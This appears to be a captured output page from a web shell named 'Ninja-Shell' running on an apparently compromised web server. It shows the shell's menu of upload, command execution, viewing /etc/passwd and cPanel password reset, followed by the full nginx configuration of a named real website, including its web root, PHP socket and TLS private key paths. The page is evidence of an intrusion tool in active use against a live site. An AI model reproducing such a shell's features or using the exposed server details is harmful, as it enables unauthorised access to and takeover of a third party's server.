{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: //proc/thread-self/root/etc/nginx/sites-enabled/ceafasia
server { root /var/www/ceafasia; index index.php index.html index.htm; server_name ceafasia.org www.ceafasia.org; location / { try_files $uri $uri/ /index.php?$args; } error_page 404 /custom_404.html; location = /custom_404.html { root /usr/share/nginx/html; internal; } error_page 500 502 503 504 /custom_50x.html; location = /custom_50x.html { root /usr/share/nginx/html; internal; } location ~ \.php$ { try_files $uri =404; fastcgi_pass unix:/var/run/php/php7.4-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } listen 443 ssl; # managed by Certbot ssl_certificate /etc/letsencrypt/live/ceafasia.org/fullchain.pem; # managed by Certbot ssl_certificate_key /etc/letsencrypt/live/ceafasia.org/privkey.pem; # managed by Certbot include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot } server { if ($host = www.ceafasia.org) { return 301 https://$host$request_uri; } # managed by Certbot if ($host = ceafasia.org) { return 301 https://$host$request_uri; } # managed by Certbot server_name ceafasia.org www.ceafasia.org; listen 80; return 404; # managed by Certbot }
./Ninja\.